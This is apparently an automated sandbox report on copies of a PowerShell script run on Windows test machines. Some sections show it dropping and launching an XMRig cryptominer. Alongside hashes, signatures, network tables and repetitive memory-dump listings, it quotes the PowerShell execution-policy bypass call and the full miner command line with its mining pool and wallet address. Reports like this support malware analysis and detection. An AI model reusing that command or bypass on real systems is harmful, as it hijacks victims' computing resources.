memory/4612-90-0x000001EB01B30000-0x000001EB01B50000-memory.dmp
memory/4612-91-0x00007FF61C100000-0x00007FF61CD33000-memory.dmp
memory/4212-93-0x00007FFE454A0000-0x00007FFE45E8C000-memory.dmp
memory/4612-92-0x00007FF61C100000-0x00007FF61CD33000-memory.dmp
memory/4212-94-0x00007FFE454A3000-0x00007FFE454A4000-memory.dmp
memory/4212-95-0x00007FFE454A0000-0x00007FFE45E8C000-memory.dmp
memory/4212-96-0x00007FFE454A0000-0x00007FFE45E8C000-memory.dmp
memory/4612-97-0x00007FF61C100000-0x00007FF61CD33000-memory.dmp
memory/4612-98-0x00007FF61C100000-0x00007FF61CD33000-memory.dmp
memory/4612-99-0x00007FF61C100000-0x00007FF61CD33000-memory.dmp
memory/4612-100-0x00007FF61C100000-0x00007FF61CD33000-memory.dmp
memory/4612-101-0x00007FF61C100000-0x00007FF61CD33000-memory.dmp
memory/4612-102-0x00007FF61C100000-0x00007FF61CD33000-memory.dmp
memory/4612-103-0x00007FF61C100000-0x00007FF61CD33000-memory.dmp
memory/4612-104-0x00007FF61C100000-0x00007FF61CD33000-memory.dmp
memory/4612-105-0x00007FF61C100000-0x00007FF61CD33000-memory.dmp
memory/4612-106-0x00007FF61C100000-0x00007FF61CD33000-memory.dmp
memory/4612-107-0x00007FF61C100000-0x00007FF61CD33000-memory.dmp
memory/4612-108-0x00007FF61C100000-0x00007FF61CD33000-memory.dmp
memory/4612-109-0x00007FF61C100000-0x00007FF61CD33000-memory.dmp
memory/4612-110-0x00007FF61C100000-0x00007FF61CD33000-memory.dmp
memory/4612-111-0x00007FF61C100000-0x00007FF61CD33000-memory.dmp
memory/4612-112-0x00007FF61C100000-0x00007FF61CD33000-memory.dmp
memory/4612-113-0x00007FF61C100000-0x00007FF61CD33000-memory.dmp
memory/4612-114-0x00007FF61C100000-0x00007FF61CD33000-memory.dmp
memory/4612-115-0x00007FF61C100000-0x00007FF61CD33000-memory.dmp
memory/4612-116-0x00007FF61C100000-0x00007FF61CD33000-memory.dmp
memory/4612-117-0x00007FF61C100000-0x00007FF61CD33000-memory.dmp
memory/4612-118-0x00007FF61C100000-0x00007FF61CD33000-memory.dmp
memory/4612-119-0x00007FF61C100000-0x00007FF61CD33000-memory.dmp
memory/4612-120-0x00007FF61C100000-0x00007FF61CD33000-memory.dmp
memory/4612-121-0x00007FF61C100000-0x00007FF61CD33000-memory.dmp
memory/4612-122-0x00007FF61C100000-0x00007FF61CD33000-memory.dmp
memory/4612-123-0x00007FF61C100000-0x00007FF61CD33000-memory.dmp
memory/4612-124-0x00007FF61C100000-0x00007FF61CD33000-memory.dmp
memory/4612-125-0x00007FF61C100000-0x00007FF61CD33000-memory.dmp
memory/4612-126-0x00007FF61C100000-0x00007FF61CD33000-memory.dmp
memory/4612-127-0x00007FF61C100000-0x00007FF61CD33000-memory.dmp
memory/4612-128-0x00007FF61C100000-0x00007FF61CD33000-memory.dmp
memory/4612-129-0x00007FF61C100000-0x00007FF61CD33000-memory.dmp
memory/4612-130-0x00007FF61C100000-0x00007FF61CD33000-memory.dmp
memory/4612-131-0x00007FF61C100000-0x00007FF61CD33000-memory.dmp
memory/4612-132-0x00007FF61C100000-0x00007FF61CD33000-memory.dmp
memory/4612-133-0x00007FF61C100000-0x00007FF61CD33000-memory.dmp
memory/4612-134-0x00007FF61C100000-0x00007FF61CD33000-memory.dmp
memory/4612-135-0x00007FF61C100000-0x00007FF61CD33000-memory.dmp
memory/4612-136-0x00007FF61C100000-0x00007FF61CD33000-memory.dmp
memory/4612-137-0x00007FF61C100000-0x00007FF61CD33000-memory.dmp
memory/4612-138-0x00007FF61C100000-0x00007FF61CD33000-memory.dmp
memory/4612-139-0x00007FF61C100000-0x00007FF61CD33000-memory.dmp
memory/4612-140-0x00007FF61C100000-0x00007FF61CD33000-memory.dmp
memory/4612-141-0x00007FF61C100000-0x00007FF61CD33000-memory.dmp
memory/4612-142-0x00007FF61C100000-0x00007FF61CD33000-memory.dmp
memory/4612-143-0x00007FF61C100000-0x00007FF61CD33000-memory.dmp
memory/4612-144-0x00007FF61C100000-0x00007FF61CD33000-memory.dmp
memory/4612-145-0x00007FF61C100000-0x00007FF61CD33000-memory.dmp
memory/4612-146-0x00007FF61C100000-0x00007FF61CD33000-memory.dmp
memory/4612-147-0x00007FF61C100000-0x00007FF61CD33000-memory.dmp
memory/4612-148-0x00007FF61C100000-0x00007FF61CD33000-memory.dmp
memory/4612-149-0x00007FF61C100000-0x00007FF61CD33000-memory.dmp
memory/4612-150-0x00007FF61C100000-0x00007FF61CD33000-memory.dmp
memory/4612-151-0x00007FF61C100000-0x00007FF61CD33000-memory.dmp
memory/4612-152-0x00007FF61C100000-0x00007FF61CD33000-memory.dmp
memory/4612-153-0x00007FF61C100000-0x00007FF61CD33000-memory.dmp
memory/4612-154-0x00007FF61C100000-0x00007FF61CD33000-memory.dmp
memory/4612-155-0x00007FF61C100000-0x00007FF61CD33000-memory.dmp
memory/4612-156-0x00007FF61C100000-0x00007FF61CD33000-memory.dmp
memory/4612-157-0x00007FF61C100000-0x00007FF61CD33000-memory.dmp
Analysis: behavioral23
Detonation Overview
Submitted
2024-05-28 01:50
Reported
2024-06-10 16:14
Platform
win10v2004-20240508-en
Max time kernel
1625s
Max time network
1636s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (15) - copia.ps1"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
Files
memory/1976-0-0x00007FFA45923000-0x00007FFA45925000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_t1j5jifp.sd5.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1976-1-0x0000027957740000-0x0000027957762000-memory.dmp
memory/1976-11-0x00007FFA45920000-0x00007FFA463E1000-memory.dmp
memory/1976-12-0x00007FFA45920000-0x00007FFA463E1000-memory.dmp
memory/1976-13-0x00007FFA45920000-0x00007FFA463E1000-memory.dmp
memory/1976-14-0x00007FFA45920000-0x00007FFA463E1000-memory.dmp
memory/1976-15-0x00007FFA45923000-0x00007FFA45925000-memory.dmp
memory/1976-16-0x00007FFA45920000-0x00007FFA463E1000-memory.dmp
memory/1976-17-0x00007FFA45920000-0x00007FFA463E1000-memory.dmp
Analysis: behavioral1
Detonation Overview
Submitted
2024-05-28 01:50
Reported
2024-06-10 15:47
Platform
win7-20240221-en
Max time kernel
1559s
Max time network
1560s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (10) - copia.ps1"
Network
Files
memory/2248-4-0x000007FEF5BCE000-0x000007FEF5BCF000-memory.dmp
memory/2248-5-0x000000001B740000-0x000000001BA22000-memory.dmp
memory/2248-6-0x0000000002730000-0x0000000002738000-memory.dmp
memory/2248-7-0x000007FEF5910000-0x000007FEF62AD000-memory.dmp
memory/2248-8-0x000007FEF5910000-0x000007FEF62AD000-memory.dmp
memory/2248-9-0x000007FEF5910000-0x000007FEF62AD000-memory.dmp
memory/2248-10-0x000007FEF5910000-0x000007FEF62AD000-memory.dmp
memory/2248-11-0x000007FEF5910000-0x000007FEF62AD000-memory.dmp
memory/2248-12-0x000007FEF5910000-0x000007FEF62AD000-memory.dmp
Analysis: behavioral5
Detonation Overview
Submitted
2024-05-28 01:50
Reported
2024-06-10 15:51
Platform
win10v2004-20240426-en
Max time kernel
1799s
Max time network
1796s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4156 wrote to memory of 4296 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4156 wrote to memory of 4296 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (11) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.111.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 82.177.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 224.107.17.2.in-addr.arpa | udp |
| US | 52.111.227.11:443 | tcp | |
| US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.173.189.20.in-addr.arpa | udp |
Files
memory/4156-0-0x00007FFA0F1E3000-0x00007FFA0F1E5000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_u1yjtfmd.0pk.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4156-10-0x000001CDF9EE0000-0x000001CDF9F02000-memory.dmp
memory/4156-11-0x00007FFA0F1E0000-0x00007FFA0FCA1000-memory.dmp
memory/4156-12-0x00007FFA0F1E0000-0x00007FFA0FCA1000-memory.dmp
memory/4156-14-0x00007FFA0F1E0000-0x00007FFA0FCA1000-memory.dmp
memory/4156-15-0x000001CDFAA40000-0x000001CDFAA52000-memory.dmp
memory/4156-16-0x000001CDFAA20000-0x000001CDFAA2A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/4296-47-0x0000025459430000-0x0000025459450000-memory.dmp
memory/4296-48-0x000002545AD70000-0x000002545AD90000-memory.dmp
memory/4296-49-0x00007FF730B90000-0x00007FF7317C3000-memory.dmp
memory/4296-52-0x000002545AD90000-0x000002545ADB0000-memory.dmp
memory/4296-51-0x000002545ADB0000-0x000002545ADD0000-memory.dmp
memory/4296-50-0x00007FF730B90000-0x00007FF7317C3000-memory.dmp
memory/4156-53-0x00007FFA0F1E3000-0x00007FFA0F1E5000-memory.dmp
memory/4156-54-0x00007FFA0F1E0000-0x00007FFA0FCA1000-memory.dmp
memory/4296-55-0x00007FF730B90000-0x00007FF7317C3000-memory.dmp
memory/4296-56-0x00007FF730B90000-0x00007FF7317C3000-memory.dmp
memory/4296-57-0x000002545ADB0000-0x000002545ADD0000-memory.dmp
memory/4296-58-0x000002545AD90000-0x000002545ADB0000-memory.dmp
memory/4296-59-0x00007FF730B90000-0x00007FF7317C3000-memory.dmp
memory/4296-60-0x00007FF730B90000-0x00007FF7317C3000-memory.dmp
memory/4296-61-0x00007FF730B90000-0x00007FF7317C3000-memory.dmp
memory/4296-62-0x00007FF730B90000-0x00007FF7317C3000-memory.dmp
memory/4296-63-0x00007FF730B90000-0x00007FF7317C3000-memory.dmp
memory/4296-64-0x00007FF730B90000-0x00007FF7317C3000-memory.dmp
memory/4296-65-0x00007FF730B90000-0x00007FF7317C3000-memory.dmp
memory/4296-66-0x00007FF730B90000-0x00007FF7317C3000-memory.dmp
memory/4296-67-0x00007FF730B90000-0x00007FF7317C3000-memory.dmp
memory/4296-68-0x00007FF730B90000-0x00007FF7317C3000-memory.dmp
memory/4296-69-0x00007FF730B90000-0x00007FF7317C3000-memory.dmp
memory/4296-70-0x00007FF730B90000-0x00007FF7317C3000-memory.dmp
memory/4296-71-0x00007FF730B90000-0x00007FF7317C3000-memory.dmp
memory/4296-72-0x00007FF730B90000-0x00007FF7317C3000-memory.dmp
memory/4296-73-0x00007FF730B90000-0x00007FF7317C3000-memory.dmp
memory/4296-74-0x00007FF730B90000-0x00007FF7317C3000-memory.dmp
memory/4296-75-0x00007FF730B90000-0x00007FF7317C3000-memory.dmp
memory/4296-76-0x00007FF730B90000-0x00007FF7317C3000-memory.dmp
memory/4296-77-0x00007FF730B90000-0x00007FF7317C3000-memory.dmp
memory/4296-78-0x00007FF730B90000-0x00007FF7317C3000-memory.dmp
memory/4296-79-0x00007FF730B90000-0x00007FF7317C3000-memory.dmp
memory/4296-80-0x00007FF730B90000-0x00007FF7317C3000-memory.dmp
memory/4296-81-0x00007FF730B90000-0x00007FF7317C3000-memory.dmp
memory/4296-82-0x00007FF730B90000-0x00007FF7317C3000-memory.dmp
memory/4296-83-0x00007FF730B90000-0x00007FF7317C3000-memory.dmp
memory/4296-84-0x00007FF730B90000-0x00007FF7317C3000-memory.dmp
memory/4296-85-0x00007FF730B90000-0x00007FF7317C3000-memory.dmp
memory/4296-86-0x00007FF730B90000-0x00007FF7317C3000-memory.dmp
memory/4296-87-0x00007FF730B90000-0x00007FF7317C3000-memory.dmp
memory/4296-88-0x00007FF730B90000-0x00007FF7317C3000-memory.dmp
memory/4296-89-0x00007FF730B90000-0x00007FF7317C3000-memory.dmp
memory/4296-90-0x00007FF730B90000-0x00007FF7317C3000-memory.dmp
memory/4296-91-0x00007FF730B90000-0x00007FF7317C3000-memory.dmp
memory/4296-92-0x00007FF730B90000-0x00007FF7317C3000-memory.dmp
memory/4296-93-0x00007FF730B90000-0x00007FF7317C3000-memory.dmp
memory/4296-94-0x00007FF730B90000-0x00007FF7317C3000-memory.dmp
memory/4296-95-0x00007FF730B90000-0x00007FF7317C3000-memory.dmp
memory/4296-96-0x00007FF730B90000-0x00007FF7317C3000-memory.dmp
memory/4296-97-0x00007FF730B90000-0x00007FF7317C3000-memory.dmp
memory/4296-98-0x00007FF730B90000-0x00007FF7317C3000-memory.dmp
memory/4296-99-0x00007FF730B90000-0x00007FF7317C3000-memory.dmp
memory/4296-100-0x00007FF730B90000-0x00007FF7317C3000-memory.dmp
memory/4296-101-0x00007FF730B90000-0x00007FF7317C3000-memory.dmp
memory/4296-102-0x00007FF730B90000-0x00007FF7317C3000-memory.dmp
memory/4296-103-0x00007FF730B90000-0x00007FF7317C3000-memory.dmp
memory/4296-104-0x00007FF730B90000-0x00007FF7317C3000-memory.dmp
memory/4296-105-0x00007FF730B90000-0x00007FF7317C3000-memory.dmp
memory/4296-106-0x00007FF730B90000-0x00007FF7317C3000-memory.dmp
memory/4296-107-0x00007FF730B90000-0x00007FF7317C3000-memory.dmp
memory/4296-108-0x00007FF730B90000-0x00007FF7317C3000-memory.dmp
memory/4296-109-0x00007FF730B90000-0x00007FF7317C3000-memory.dmp
memory/4296-110-0x00007FF730B90000-0x00007FF7317C3000-memory.dmp
memory/4296-111-0x00007FF730B90000-0x00007FF7317C3000-memory.dmp
memory/4296-112-0x00007FF730B90000-0x00007FF7317C3000-memory.dmp
memory/4296-113-0x00007FF730B90000-0x00007FF7317C3000-memory.dmp
memory/4296-114-0x00007FF730B90000-0x00007FF7317C3000-memory.dmp
memory/4296-115-0x00007FF730B90000-0x00007FF7317C3000-memory.dmp
memory/4296-116-0x00007FF730B90000-0x00007FF7317C3000-memory.dmp
memory/4296-117-0x00007FF730B90000-0x00007FF7317C3000-memory.dmp
Analysis: behavioral11
Detonation Overview
Submitted
2024-05-28 01:50
Reported
2024-06-10 16:04
Platform
win10v2004-20240426-en
Max time kernel
1798s
Max time network
1803s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1844 wrote to memory of 4664 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 1844 wrote to memory of 4664 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (12) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 18.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 20.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| NL | 52.142.223.178:80 | tcp | |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
Files
memory/1844-0-0x00007FFFD8E43000-0x00007FFFD8E45000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4nbcer0p.e3b.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1844-10-0x000001FD79030000-0x000001FD79052000-memory.dmp
memory/1844-11-0x00007FFFD8E40000-0x00007FFFD9901000-memory.dmp
memory/1844-12-0x00007FFFD8E40000-0x00007FFFD9901000-memory.dmp
memory/1844-14-0x00007FFFD8E40000-0x00007FFFD9901000-memory.dmp
